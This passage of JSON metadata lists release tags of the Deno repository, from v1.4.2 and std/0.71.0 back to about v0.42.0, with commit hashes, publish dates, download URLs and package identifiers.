0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed452